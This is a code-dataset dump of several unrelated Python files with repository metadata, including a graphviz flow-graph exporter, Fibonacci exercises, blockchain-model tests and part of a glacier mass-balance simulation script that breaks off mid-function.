sc_log.log(logging.DEBUG, "Completed S3 upload.")
except FileNotFoundError:
sc_log.exception("The file was not found.")
except NoCredentialsError:
sc_log.exception("There is an issue with the credentials.")
| 0 | 0 | 0 |
6b3a348a4ea5ce822a4219b204beebee38d50090 | 363 | py | Python | src/pandas_profiling/report/presentation/core/html.py | abhicantdraw/pandas-profiling | a12ebb7a94b9371df94bf611237a389d99f8bc00 | [
"MIT"
] | 8,107 | 2018-01-07T23:27:39.000Z | 2022-02-22T12:57:11.000Z | src/pandas_profiling/report/presentation/core/html.py | abhicantdraw/pandas-profiling | a12ebb7a94b9371df94bf611237a389d99f8bc00 | [
"MIT"
] | 771 | 2018-01-06T11:33:08.000Z | 2022-02-21T11:16:02.000Z | src/pandas_profiling/report/presentation/core/html.py | abhicantdraw/pandas-profiling | a12ebb7a94b9371df94bf611237a389d99f8bc00 | [
"MIT"
] | 1,308 | 2018-01-08T21:22:08.000Z | 2022-02-21T04:10:21.000Z | from typing import Any
from pandas_profiling.report.presentation.core.item_renderer import ItemRenderer
| 24.2 | 80 | 0.677686 | from typing import Any
from pandas_profiling.report.presentation.core.item_renderer import ItemRenderer
class HTML(ItemRenderer):
def __init__(self, content: str, **kwargs):
super().__init__("html", {"html": content}, **kwargs)
def __repr__(self) -> str:
return "HTML"
def render(self) -> Any:
raise NotImplementedError()
| 150 | 4 | 103 |
ad8010831a49578bee5bd4cb162c4edd05b5f6a3 | 3,679 | py | Python | pyflowgraph/visual.py | stspbu/code-change-miner | a9aceb92a3484f0c3c8140bbb986bfec1e2d7562 | [
"Apache-2.0"
] | 1 | 2020-09-06T16:32:17.000Z | 2020-09-06T16:32:17.000Z | pyflowgraph/visual.py | neomatrix369/code-change-miner | 4fe24d03c8512202bc80a77bf1ebee456d8400d7 | [
"Apache-2.0"
] | null | null | null | pyflowgraph/visual.py | neomatrix369/code-change-miner | 4fe24d03c8512202bc80a77bf1ebee456d8400d7 | [
"Apache-2.0"
] | null | null | null | import graphviz as gv
import os
from pyflowgraph.models import ExtControlFlowGraph, DataNode, OperationNode, ControlNode, ControlEdge, DataEdge, EntryNode
| 41.337079 | 122 | 0.643653 | import graphviz as gv
import os
from pyflowgraph.models import ExtControlFlowGraph, DataNode, OperationNode, ControlNode, ControlEdge, DataEdge, EntryNode
def _get_label_and_attrs(node, show_op_kind=True, show_data_keys=False):
label = f'{node.label}'
attrs = {}
if isinstance(node, DataNode):
attrs['shape'] = 'ellipse'
if show_data_keys:
label = f'{label} #{node.key}'
if show_op_kind:
label = f'{label} <{node.kind}>'
elif isinstance(node, OperationNode):
attrs['shape'] = 'box'
if show_op_kind:
label = f'{label} <{node.kind}>'
elif isinstance(node, ControlNode):
attrs['shape'] = 'diamond'
label = f'{label} [{node.statement_num}]'
return label, attrs
def _convert_to_visual_graph(graph: ExtControlFlowGraph, file_name: str,
show_op_kinds=True, show_data_keys=False, show_control_branch=False,
separate_mapped=True, show_entry_node=True,
min_statement_num=None, max_statement_num=None):
vg = gv.Digraph(name=file_name, format='pdf')
used = {}
for node in graph.nodes:
if isinstance(node, EntryNode) and not show_entry_node \
or min_statement_num is not None and node.statement_num < min_statement_num \
or max_statement_num is not None and node.statement_num > max_statement_num:
continue
if used.get(node):
continue
if separate_mapped and node.mapped:
label, attrs = _get_label_and_attrs(node, show_op_kind=show_op_kinds, show_data_keys=show_data_keys)
mapped_label, mapped_attrs = _get_label_and_attrs(
node.mapped, show_op_kind=show_op_kinds, show_data_keys=show_data_keys)
used[node] = used[node.mapped] = True
s = gv.Digraph(f'subgraph: {node.statement_num} to {node.mapped.statement_num}')
s.node(f'{node.statement_num}', label=label, _attributes=attrs)
s.node(f'{node.mapped.statement_num}', label=mapped_label, _attributes=mapped_attrs)
rank = 'source' if isinstance(node, EntryNode) else 'same'
s.graph_attr.update(rank=rank)
vg.subgraph(s)
else:
label, attrs = _get_label_and_attrs(node, show_op_kind=show_op_kinds, show_data_keys=show_data_keys)
vg.node(f'{node.statement_num}', label=label, _attributes=attrs)
for node in graph.nodes:
for edge in node.in_edges:
if isinstance(edge.node_from, EntryNode) and not show_entry_node \
or min_statement_num is not None and edge.node_from.statement_num < min_statement_num \
or max_statement_num is not None and edge.node_from.statement_num > max_statement_num:
continue
label = edge.label
attrs = {}
if show_control_branch and isinstance(edge, ControlEdge):
label = f'{"T" if edge.branch_kind else "F"} {label}'
if isinstance(edge, DataEdge):
attrs['style'] = 'dotted'
vg.edge(str(edge.node_from.statement_num), str(edge.node_to.statement_num), xlabel=label, _attributes=attrs)
return vg
def export_graph_image(graph: ExtControlFlowGraph, path: str = 'pfg.dot', show_op_kinds=True, show_data_keys=False):
directory, file_name = os.path.split(path)
visual_graph = _convert_to_visual_graph(graph, file_name, show_control_branch=True,
show_op_kinds=show_op_kinds, show_data_keys=show_data_keys)
visual_graph.render(path)
| 3,451 | 0 | 69 |
b484bf03eff33ef8a88973fb7e0988e315bc3613 | 591 | py | Python | learning/01-pattern/00-recursion-backtracking/07-fibonacci.py | tienduy-nguyen/ds-algorithms | 5c211393f19a97215beb061ed826362fadf83326 | [
"MIT"
] | null | null | null | learning/01-pattern/00-recursion-backtracking/07-fibonacci.py | tienduy-nguyen/ds-algorithms | 5c211393f19a97215beb061ed826362fadf83326 | [
"MIT"
] | null | null | null | learning/01-pattern/00-recursion-backtracking/07-fibonacci.py | tienduy-nguyen/ds-algorithms | 5c211393f19a97215beb061ed826362fadf83326 | [
"MIT"
] | null | null | null |
# not good
# Dynamic programing
| 17.382353 | 66 | 0.529611 | def factorial(n):
if n == 0:
return 1
else:
return n * factorial(n - 1)
# not good
def fibonacci_recursion(n):
if n < 2:
return n
return fibonacci_recursion(n - 1) + fibonacci_recursion(n - 2)
def fibonacci(n):
if n <= 1:
return n
fib = [0, 1]
for i in range(2, n + 1):
fib[i] = fib[i - 1] + fib[i - 2]
return fib[n]
# Dynamic programing
def fibonacci_dp(n):
if n <= 1:
return n
first, second = 0, 1
for i in range(2, n + 1):
first, second = second, first + second
return second
| 465 | 0 | 89 |
7ac1fd31606dbc3b5b90d1efc4ed050693153622 | 1,803 | py | Python | tests/test_model.py | daifoundation/ethtx_ce | 5aa0de0e33f6af569e840554b024116c9a21d54b | [
"Apache-2.0"
] | 1 | 2021-07-26T11:05:24.000Z | 2021-07-26T11:05:24.000Z | tests/test_model.py | daifoundation/ethtx_ce | 5aa0de0e33f6af569e840554b024116c9a21d54b | [
"Apache-2.0"
] | null | null | null | tests/test_model.py | daifoundation/ethtx_ce | 5aa0de0e33f6af569e840554b024116c9a21d54b | [
"Apache-2.0"
] | 1 | 2021-07-26T11:05:32.000Z | 2021-07-26T11:05:32.000Z | from datetime import datetime
from ethtx_ce.config import EthConfig
from ethtx_ce.backend.models.objects_model import Block, Event, Transaction
from mocks.mocks import MockWeb3Provider
| 37.5625 | 86 | 0.716583 | from datetime import datetime
from ethtx_ce.config import EthConfig
from ethtx_ce.backend.models.objects_model import Block, Event, Transaction
from mocks.mocks import MockWeb3Provider
class TestModel:
def test_create_transaction(self):
tx_hash = "0xd7701a0fc05593aee3a16f20cab605db7183f752ae942cc75fd0975feaf1072e"
mock_web3_provider = MockWeb3Provider()
tx = Transaction(tx_hash, web3provider=mock_web3_provider)
assert tx is not None
self._check_some_attributes_of_tx(tx)
def test_create_block(self):
mock_web3_provider = MockWeb3Provider()
block = Block(1, web3provider=mock_web3_provider)
# block = Block(1)
assert block is not None
self._check_some_attributes_of_block(block)
def _check_some_attributes_of_block(self, block: Block):
assert block is not None
assert block.block_number is not None
assert block.block_hash is not None
assert block.timestamp is not None
assert block.miner is not None
assert block.tx_count is not None
def _check_some_attributes_of_tx(self, tx: Transaction):
assert tx.tx_hash is not None
assert tx.from_address is not None
assert tx.to_address is not None
assert tx.timestamp is not None
assert tx.tx_index is not None
def test_create_event_from_tx_hash(self):
tx = "0xd7701a0fc05593aee3a16f20cab605db7183f752ae942cc75fd0975feaf1072e"
receipt = MockWeb3Provider().get_transaction_receipt(tx)
e = Event(EthConfig.DEFAULT_CHAIN, tx, datetime.now(), receipt.logs[0])
assert e is not None
assert e.chain_id is not None
assert e.tx_hash is not None
assert e.timestamp is not None
assert e.log_index is not None
| 1,464 | -5 | 157 |
e7f77c402f926f2c0f88139332f635d977b294bd | 65,367 | py | Python | run_simulation_woggm.py | Wang518hongyu/PyGEMwangtest | f6ff507681b45599d0ecce5be2e5292e94fd09f7 | [
"MIT"
] | null | null | null | run_simulation_woggm.py | Wang518hongyu/PyGEMwangtest | f6ff507681b45599d0ecce5be2e5292e94fd09f7 | [
"MIT"
] | null | null | null | run_simulation_woggm.py | Wang518hongyu/PyGEMwangtest | f6ff507681b45599d0ecce5be2e5292e94fd09f7 | [
"MIT"
] | null | null | null | """Run a model simulation."""
# Default climate data is ERA-Interim; specify CMIP5 by specifying a filename to the argument:
# (Command line) python run_simulation_list_multiprocess.py -gcm_list_fn=C:\...\gcm_rcpXX_filenames.txt
# - Default is running ERA-Interim in parallel with five processors.
# (Spyder) %run run_simulation_list_multiprocess.py C:\...\gcm_rcpXX_filenames.txt -option_parallels=0
# - Spyder cannot run parallels, so always set -option_parallels=0 when testing in Spyder.
# Spyder cannot run parallels, so always set -option_parallels=0 when testing in Spyder.
# Built-in libraries
import argparse
import collections
import inspect
import multiprocessing
import os
import time
# External libraries
import pandas as pd
import pickle
import numpy as np
import xarray as xr
# Local libraries
import class_climate
import class_mbdata
import pygem_input as input
import pygemfxns_gcmbiasadj as gcmbiasadj
import pygemfxns_massbalance as massbalance
import pygemfxns_modelsetup as modelsetup
import spc_split_glaciers as split_glaciers
#%% FUNCTIONS
def getparser():
"""
Use argparse to add arguments from the command line
Parameters
----------
gcm_list_fn (optional) : str
text file that contains the climate data to be used in the model simulation
gcm_name (optional) : str
gcm name
rcp (optional) : str
representative concentration pathway (ex. 'rcp26')
num_simultaneous_processes (optional) : int
number of cores to use in parallels
option_parallels (optional) : int
switch to use parallels or not
rgi_glac_number_fn (optional) : str
filename of .pkl file containing a list of glacier numbers that used to run batches on the supercomputer
batch_number (optional): int
batch number used to differentiate output on supercomputer
option_ordered : int
option to keep glaciers ordered or to grab every n value for the batch
(the latter helps make sure run times on each core are similar as it removes any timing differences caused by
regional variations)
debug (optional) : int
Switch for turning debug printing on or off (default = 0 (off))
debug_spc (optional) : int
Switch for turning debug printing of spc on or off (default = 0 (off))
Returns
-------
Object containing arguments and their respective values.
"""
parser = argparse.ArgumentParser(description="run simulations from gcm list in parallel")
# add arguments
parser.add_argument('-gcm_list_fn', action='store', type=str, default=input.ref_gcm_name,
help='text file full of commands to run')
parser.add_argument('-gcm_name', action='store', type=str, default=None,
help='GCM name used for model run')
parser.add_argument('-rcp', action='store', type=str, default=None,
help='rcp scenario used for model run (ex. rcp26)')
parser.add_argument('-num_simultaneous_processes', action='store', type=int, default=4,
help='number of simultaneous processes (cores) to use')
parser.add_argument('-option_parallels', action='store', type=int, default=1,
help='Switch to use or not use parallels (1 - use parallels, 0 - do not)')
parser.add_argument('-rgi_glac_number_fn', action='store', type=str, default=None,
help='Filename containing list of rgi_glac_number, helpful for running batches on spc')
parser.add_argument('-batch_number', action='store', type=int, default=None,
help='Batch number used to differentiate output on supercomputer')
parser.add_argument('-option_ordered', action='store', type=int, default=1,
help='switch to keep lists ordered or not')
parser.add_argument('-debug', action='store', type=int, default=0,
help='Boolean for debugging to turn it on or off (default 0 is off')
parser.add_argument('-debug_spc', action='store', type=int, default=0,
help='Boolean for debugging to turn it on or off (default 0 is off')
return parser
def calc_stats_array(data, stats_cns=input.sim_stat_cns):
"""
Calculate stats for a given variable
Parameters
----------
vn : str
variable name
ds : xarray dataset
dataset of output with all ensemble simulations
Returns
-------
stats : np.array
Statistics related to a given variable
"""
if 'mean' in stats_cns:
stats = data.mean(axis=1)[:,np.newaxis]
if 'std' in stats_cns:
stats = np.append(stats, data.std(axis=1)[:,np.newaxis], axis=1)
if '2.5%' in stats_cns:
stats = np.append(stats, np.percentile(data, 2.5, axis=1)[:,np.newaxis], axis=1)
if '25%' in stats_cns:
stats = np.append(stats, np.percentile(data, 25, axis=1)[:,np.newaxis], axis=1)
if 'median' in stats_cns:
stats = np.append(stats, np.median(data, axis=1)[:,np.newaxis], axis=1)
if '75%' in stats_cns:
stats = np.append(stats, np.percentile(data, 75, axis=1)[:,np.newaxis], axis=1)
if '97.5%' in stats_cns:
stats = np.append(stats, np.percentile(data, 97.5, axis=1)[:,np.newaxis], axis=1)
return stats
def create_xrdataset(main_glac_rgi, dates_table, sim_iters=input.sim_iters, stat_cns=input.sim_stat_cns,
record_stats=0, option_wateryear=input.gcm_wateryear):
"""
Create empty xarray dataset that will be used to record simulation runs.
Parameters
----------
main_glac_rgi : pandas dataframe
dataframe containing relevant rgi glacier information
dates_table : pandas dataframe
table of the dates, months, days in month, etc.
sim_iters : int
number of simulation runs included
stat_cns : list
list of strings containing statistics that will be used on simulations
record_stats : int
Switch to change from recording simulations to statistics
Returns
-------
output_ds_all : xarray Dataset
empty xarray dataset that contains variables and attributes to be filled in by simulation runs
encoding : dictionary
encoding used with exporting xarray dataset to netcdf
"""
if input.output_package == 2:
# Create empty datasets for each variable and merge them
# Coordinate values
output_variables = input.output_variables_package2
glac_values = main_glac_rgi.index.values
annual_columns = np.unique(dates_table['wateryear'].values)[0:int(dates_table.shape[0]/12)]
time_values = dates_table.loc[input.spinupyears*12:dates_table.shape[0]+1,'date'].tolist()
year_values = annual_columns[input.spinupyears:annual_columns.shape[0]]
year_plus1_values = np.concatenate((annual_columns[input.spinupyears:annual_columns.shape[0]],
np.array([annual_columns[annual_columns.shape[0]-1]+1])))
# Year type for attributes
if option_wateryear == 1:
year_type = 'water year'
elif option_wateryear == 2:
year_type = 'calendar year'
else:
year_type = 'custom year'
# Switch to record simulations or statistics
if record_stats == 0:
record_name = 'sim'
record_name_values = np.arange(0,sim_iters)
elif record_stats == 1:
record_name = 'stats'
record_name_values = input.sim_stat_cns
# Variable coordinates dictionary
output_coords_dict = {
'prec_glac_monthly': collections.OrderedDict(
[('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
'temp_glac_monthly': collections.OrderedDict(
[('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
'acc_glac_monthly': collections.OrderedDict(
[('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
'refreeze_glac_monthly': collections.OrderedDict(
[('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
'melt_glac_monthly': collections.OrderedDict(
[('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
'frontalablation_glac_monthly': collections.OrderedDict(
[('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
'massbaltotal_glac_monthly': collections.OrderedDict(
[('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
'runoff_glac_monthly': collections.OrderedDict(
[('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
'snowline_glac_monthly': collections.OrderedDict(
[('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
'area_glac_annual': collections.OrderedDict(
[('glac', glac_values), ('year_plus1', year_plus1_values), (record_name, record_name_values)]),
'volume_glac_annual': collections.OrderedDict(
[('glac', glac_values), ('year_plus1', year_plus1_values), (record_name, record_name_values)]),
'ELA_glac_annual': collections.OrderedDict(
[('glac', glac_values), ('year', year_values), (record_name, record_name_values)]),
'offglac_prec_monthly': collections.OrderedDict(
[('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
'offglac_refreeze_monthly': collections.OrderedDict(
[('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
'offglac_melt_monthly': collections.OrderedDict(
[('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
'offglac_snowpack_monthly': collections.OrderedDict(
[('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
'offglac_runoff_monthly': collections.OrderedDict(
[('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
}
# Attributes dictionary
output_attrs_dict = {
'time': {
'long_name': 'date',
'year_type':year_type},
'glac': {
'long_name': 'glacier index',
'comment': 'glacier index value that refers to the glacier table'},
'year': {
'long_name': 'years',
'year_type': year_type,
'comment': 'years referring to the start of each year'},
'year_plus1': {
'long_name': 'years plus one additional year',
'year_type': year_type,
'comment': ('additional year allows one to record glacier dimension changes at end of '
'model run')},
'sim': {
'long_name': 'simulation number',
'comment': 'simulation numbers only needed for MCMC methods'},
'stats': {
'long_name': 'variable statistics',
'comment': '% refers to percentiles'},
'temp_glac_monthly': {
'long_name': 'glacier-wide mean air temperature',
'units': 'degC',
'temporal_resolution': 'monthly',
'comment': (
'each elevation bin is weighted equally to compute the mean temperature, and '
'bins where the glacier no longer exists due to retreat have been removed')},
'prec_glac_monthly': {
'long_name': 'glacier-wide precipitation (liquid)',
'units': 'm',
'temporal_resolution': 'monthly',
'comment': 'only the liquid precipitation, solid precipitation excluded'},
'acc_glac_monthly': {
'long_name': 'glacier-wide accumulation',
'units': 'm w.e.',
'temporal_resolution': 'monthly',
'comment': 'only the solid precipitation'},
'refreeze_glac_monthly': {
'long_name': 'glacier-wide refreeze',
'units': 'm w.e.',
'temporal_resolution': 'monthly'},
'melt_glac_monthly': {
'long_name': 'glacier-wide melt',
'units': 'm w.e.',
'temporal_resolution': 'monthly'},
'frontalablation_glac_monthly': {
'long_name': 'glacier-wide frontal ablation',
'units': 'm w.e.',
'temporal_resolution': 'monthly',
'comment': (
'mass losses from calving, subaerial frontal melting, sublimation above the '
'waterline and subaqueous frontal melting below the waterline')},
'massbaltotal_glac_monthly': {
'long_name': 'glacier-wide total mass balance',
'units': 'm w.e.',
'temporal_resolution': 'monthly',
'comment': (
'total mass balance is the sum of the climatic mass balance and frontal '
'ablation')},
'runoff_glac_monthly': {
'long_name': 'glacier-wide runoff',
'units': 'm**3',
'temporal_resolution': 'monthly',
'comment': 'runoff from the glacier terminus, which moves over time'},
'snowline_glac_monthly': {
'long_name': 'transient snowline',
'units': 'm a.s.l.',
'temporal_resolution': 'monthly',
'comment': 'transient snowline is altitude separating snow from ice/firn'},
'area_glac_annual': {
'long_name': 'glacier area',
'units': 'km**2',
'temporal_resolution': 'annual',
'comment': 'area used for the duration of the defined start/end of year'},
'volume_glac_annual': {
'long_name': 'glacier volume',
'units': 'km**3 ice',
'temporal_resolution': 'annual',
'comment': 'volume based on area and ice thickness used for that year'},
'ELA_glac_annual': {
'long_name': 'annual equilibrium line altitude',
'units': 'm a.s.l.',
'temporal_resolution': 'annual',
'comment': (
'equilibrium line altitude is the elevation where the climatic mass balance is '
'zero')},
'offglac_prec_monthly': {
'long_name': 'off-glacier-wide precipitation (liquid)',
'units': 'm',
'temporal_resolution': 'monthly',
'comment': 'only the liquid precipitation, solid precipitation excluded'},
'offglac_refreeze_monthly': {
'long_name': 'off-glacier-wide refreeze',
'units': 'm w.e.',
'temporal_resolution': 'monthly'},
'offglac_melt_monthly': {
'long_name': 'off-glacier-wide melt',
'units': 'm w.e.',
'temporal_resolution': 'monthly',
'comment': 'only melt of snow and refreeze since off-glacier'},
'offglac_runoff_monthly': {
'long_name': 'off-glacier-wide runoff',
'units': 'm**3',
'temporal_resolution': 'monthly',
'comment': 'off-glacier runoff from area where glacier no longer exists'},
'offglac_snowpack_monthly': {
'long_name': 'off-glacier-wide snowpack',
'units': 'm w.e.',
'temporal_resolution': 'monthly',
'comment': 'snow remaining accounting for new accumulation, melt, and refreeze'},
}
# Add variables to empty dataset and merge together
count_vn = 0
encoding = {}
noencoding_vn = ['stats', 'glac_attrs']
for vn in output_variables:
count_vn += 1
empty_holder = np.zeros([len(output_coords_dict[vn][i]) for i in list(output_coords_dict[vn].keys())])
output_ds = xr.Dataset({vn: (list(output_coords_dict[vn].keys()), empty_holder)},
coords=output_coords_dict[vn])
# Merge datasets of stats into one output
if count_vn == 1:
output_ds_all = output_ds
else:
output_ds_all = xr.merge((output_ds_all, output_ds))
# Add a glacier table so that the glaciers attributes accompany the netcdf file
main_glac_rgi_float = main_glac_rgi[input.output_glacier_attr_vns].copy()
main_glac_rgi_xr = xr.Dataset({'glacier_table': (('glac', 'glac_attrs'), main_glac_rgi_float.values)},
coords={'glac': glac_values,
'glac_attrs': main_glac_rgi_float.columns.values})
output_ds_all = output_ds_all.combine_first(main_glac_rgi_xr)
output_ds_all.glacier_table.attrs['long_name'] = 'RGI glacier table'
output_ds_all.glacier_table.attrs['comment'] = 'table contains attributes from RGI for each glacier'
output_ds_all.glac_attrs.attrs['long_name'] = 'RGI glacier attributes'
# Add attributes
for vn in output_ds_all.variables:
try:
output_ds_all[vn].attrs = output_attrs_dict[vn]
except:
pass
# Encoding (specify _FillValue, offsets, etc.)
if vn not in noencoding_vn:
encoding[vn] = {'_FillValue': False}
return output_ds_all, encoding
def convert_glacwide_results(elev_bins, glac_bin_temp, glac_bin_prec, glac_bin_acc, glac_bin_refreeze,
glac_bin_snowpack, glac_bin_melt, glac_bin_frontalablation, glac_bin_massbalclim_annual,
glac_bin_area_annual, glac_bin_icethickness_annual):
"""
Convert raw runmassbalance function output to glacier-wide results for output package 2
Parameters
----------
elev_bins : numpy array
elevation of each elevation bin
glac_bin_temp : numpy array
temperature for each elevation bin for each timestep
glac_bin_prec : numpy array
precipitation (liquid) for each elevation bin for each timestep
glac_bin_acc : numpy array
accumulation (solid precipitation) for each elevation bin for each timestep
glac_bin_refreeze : numpy array
refreeze for each elevation bin for each timestep
glac_bin_snowpack : numpy array
snowpack for each elevation bin for each timestep
glac_bin_melt : numpy array
glacier melt for each elevation bin for each timestep
glac_bin_frontalablation : numpy array
frontal ablation for each elevation bin for each timestep
glac_bin_massbalclim_annual : numpy array
annual climatic mass balance for each elevation bin for each timestep
glac_bin_area_annual : numpy array
annual glacier area for each elevation bin for each timestep
glac_bin_icethickness_annual: numpy array
annual ice thickness for each elevation bin for each timestep
Returns
-------
glac_wide_temp : np.array
monthly mean glacier-wide temperature (bins weighted equally)
glac_wide_prec : np.array
monthly glacier-wide precipitation (liquid only)
glac_wide_acc : np.array
monthly glacier-wide accumulation (solid precipitation only)
glac_wide_refreeze : np.array
monthly glacier-wide refreeze
glac_wide_melt : np.array
monthly glacier-wide melt
glac_wide_frontalablation : np.array
monthly glacier-wide frontal ablation
glac_wide_massbaltotal : np.array
monthly glacier-wide total mass balance (climatic mass balance + frontal ablation)
glac_wide_runoff: np.array
monthly glacier-wide runoff at the terminus of the glacier
glac_wide_snowline : np.array
monthly glacier-wide snowline
glac_wide_area_annual : np.array
annual glacier area
glac_wide_volume_annual : np.array
annual glacier volume
glac_wide_ELA_annual : np.array
annual equilibrium line altitude
"""
# Preset desired output (needed to avoid dividing by zero)
glac_wide_temp = np.zeros(glac_bin_temp.shape[1])
glac_wide_prec = np.zeros(glac_bin_temp.shape[1])
glac_wide_acc = np.zeros(glac_bin_temp.shape[1])
glac_wide_refreeze = np.zeros(glac_bin_temp.shape[1])
glac_wide_melt = np.zeros(glac_bin_temp.shape[1])
glac_wide_frontalablation = np.zeros(glac_bin_temp.shape[1])
# Compute desired output
glac_bin_area = glac_bin_area_annual[:,0:glac_bin_area_annual.shape[1]-1].repeat(12,axis=1)
glac_wide_area = glac_bin_area.sum(axis=0)
glac_wide_temp_sum = glac_bin_temp.sum(axis=0)
glac_bin_temp_nonzero = np.zeros(glac_bin_temp.shape)
glac_bin_temp_nonzero[glac_bin_temp != 0] = 1
glac_wide_temp_bincount = glac_bin_temp_nonzero.sum(axis=0)
glac_wide_temp[glac_wide_temp_bincount > 0] = (glac_wide_temp_sum[glac_wide_temp_bincount > 0] /
glac_wide_temp_bincount[glac_wide_temp_bincount > 0])
glac_wide_prec_mkm2 = (glac_bin_prec * glac_bin_area).sum(axis=0)
glac_wide_prec[glac_wide_prec_mkm2 > 0] = (glac_wide_prec_mkm2[glac_wide_prec_mkm2 > 0] /
glac_wide_area[glac_wide_prec_mkm2 > 0])
glac_wide_acc_mkm2 = (glac_bin_acc * glac_bin_area).sum(axis=0)
glac_wide_acc[glac_wide_acc_mkm2 > 0] = (glac_wide_acc_mkm2[glac_wide_acc_mkm2 > 0] /
glac_wide_area[glac_wide_acc_mkm2 > 0])
glac_wide_refreeze_mkm2 = (glac_bin_refreeze * glac_bin_area).sum(axis=0)
glac_wide_refreeze[glac_wide_refreeze_mkm2 > 0] = (glac_wide_refreeze_mkm2[glac_wide_refreeze_mkm2 > 0] /
glac_wide_area[glac_wide_refreeze_mkm2 > 0])
glac_wide_melt_mkm2 = (glac_bin_melt * glac_bin_area).sum(axis=0)
glac_wide_melt[glac_wide_melt_mkm2 > 0] = (glac_wide_melt_mkm2[glac_wide_melt_mkm2 > 0] /
glac_wide_area[glac_wide_melt_mkm2 > 0])
glac_wide_frontalablation_mkm2 = (glac_bin_frontalablation * glac_bin_area).sum(axis=0)
glac_wide_frontalablation[glac_wide_frontalablation_mkm2 > 0] = (
glac_wide_frontalablation_mkm2[glac_wide_frontalablation_mkm2 > 0] /
glac_wide_area[glac_wide_frontalablation_mkm2 > 0])
glac_wide_massbalclim = glac_wide_acc + glac_wide_refreeze - glac_wide_melt
glac_wide_massbaltotal = glac_wide_massbalclim - glac_wide_frontalablation
glac_wide_runoff = (glac_wide_prec + glac_wide_melt - glac_wide_refreeze) * glac_wide_area * (1000)**2
# units: (m + m w.e. - m w.e.) * km**2 * (1000 m / 1 km)**2 = m**3
glac_wide_snowline = (glac_bin_snowpack > 0).argmax(axis=0)
glac_wide_snowline[glac_wide_snowline > 0] = (elev_bins[glac_wide_snowline[glac_wide_snowline > 0]] -
input.binsize/2)
glac_wide_area_annual = glac_bin_area_annual.sum(axis=0)
glac_wide_volume_annual = (glac_bin_area_annual * glac_bin_icethickness_annual / 1000).sum(axis=0)
glac_wide_ELA_annual = (glac_bin_massbalclim_annual > 0).argmax(axis=0)
glac_wide_ELA_annual[glac_wide_ELA_annual > 0] = (elev_bins[glac_wide_ELA_annual[glac_wide_ELA_annual > 0]] -
input.binsize/2)
# ELA and snowline can't be below minimum elevation
glac_zmin_annual = elev_bins[(glac_bin_area_annual > 0).argmax(axis=0)][:-1] - input.binsize/2
glac_wide_ELA_annual[glac_wide_ELA_annual < glac_zmin_annual] = (
glac_zmin_annual[glac_wide_ELA_annual < glac_zmin_annual])
glac_zmin = elev_bins[(glac_bin_area > 0).argmax(axis=0)] - input.binsize/2
glac_wide_snowline[glac_wide_snowline < glac_zmin] = glac_zmin[glac_wide_snowline < glac_zmin]
# print('DELETE ME - TESTING')
# # Compute glacier volume change for every time step and use this to compute mass balance
# # this will work for any indexing
# glac_wide_area = glac_wide_area_annual[:-1].repeat(12)
#
## print('glac_wide_area_annual:', glac_wide_area_annual)
#
# # Mass change [km3 mwe]
# # mb [mwea] * (1 km / 1000 m) * area [km2]
# glac_wide_masschange = glac_wide_massbaltotal / 1000 * glac_wide_area
#
# print('glac_wide_melt:', glac_wide_melt)
## print('glac_wide_massbaltotal:', glac_wide_massbaltotal)
## print('glac_wide_masschange:', glac_wide_masschange)
## print('glac_wide_masschange.shape[0] / 12:', glac_wide_masschange.shape[0] / 12)
#
# # Mean annual mass balance [mwea]
# mb_mwea = (glac_wide_masschange.sum() / glac_wide_area[0] * 1000 /
# (glac_wide_masschange.shape[0] / 12))
# print(' mb_model [mwea]:', mb_mwea.round(3))
return (glac_wide_temp, glac_wide_prec, glac_wide_acc, glac_wide_refreeze, glac_wide_melt,
glac_wide_frontalablation, glac_wide_massbaltotal, glac_wide_runoff, glac_wide_snowline,
glac_wide_area_annual, glac_wide_volume_annual, glac_wide_ELA_annual)
def main(list_packed_vars):
"""
Model simulation
Parameters
----------
list_packed_vars : list
list of packed variables that enable the use of parallels
Returns
-------
netcdf files of the simulation output (specific output is dependent on the output option)
"""
# Unpack variables
count = list_packed_vars[0]
glac_no = list_packed_vars[1]
regions_str = list_packed_vars[2]
gcm_name = list_packed_vars[3]
parser = getparser()
args = parser.parse_args()
if (gcm_name != input.ref_gcm_name) and (args.rcp is None):
rcp_scenario = os.path.basename(args.gcm_list_fn).split('_')[1]
elif args.rcp is not None:
rcp_scenario = args.rcp
if debug:
if 'rcp_scenario' in locals():
print(rcp_scenario)
if args.debug_spc == 1:
debug_spc = True
else:
debug_spc = False
# ===== LOAD GLACIERS =====
main_glac_rgi = modelsetup.selectglaciersrgitable(glac_no=glac_no)
# Load glacier data for Huss and Farinotti to avoid repetitively reading the csv file (not needed for OGGM)
if input.hyps_data in ['Huss', 'Farinotti']:
# Glacier hypsometry [km**2], total area
main_glac_hyps = modelsetup.import_Husstable(main_glac_rgi, input.hyps_filepath, input.hyps_filedict,
input.hyps_colsdrop)
# Ice thickness [m], average
main_glac_icethickness = modelsetup.import_Husstable(main_glac_rgi, input.thickness_filepath,
input.thickness_filedict, input.thickness_colsdrop)
main_glac_icethickness[main_glac_icethickness < 0] = 0
main_glac_hyps[main_glac_icethickness == 0] = 0
# Width [km], average
main_glac_width = modelsetup.import_Husstable(main_glac_rgi, input.width_filepath, input.width_filedict,
input.width_colsdrop)
# if input.option_surfacetype_debris == 1:
# main_glac_debrisfactor = modelsetup.import_Husstable(main_glac_rgi, input.debris_fp, input.debris_filedict,
# input.debris_colsdrop)
# else:
# print('\n\nDELETE ME - CHECK THAT THIS IS SAME FORMAT AS MAIN_GLAC_HYPS AND OTHERS\n\n')
# main_glac_debrisfactor = np.zeros(main_glac_hyps.shape) + 1
# main_glac_debrisfactor[main_glac_hyps == 0] = 0
# ===== TIME PERIOD =====
dates_table = modelsetup.datesmodelrun(startyear=input.gcm_startyear, endyear=input.gcm_endyear,
spinupyears=input.gcm_spinupyears, option_wateryear=input.gcm_wateryear)
# # =================
# if debug:
# # Select dates including future projections
# # - nospinup dates_table needed to get the proper time indices
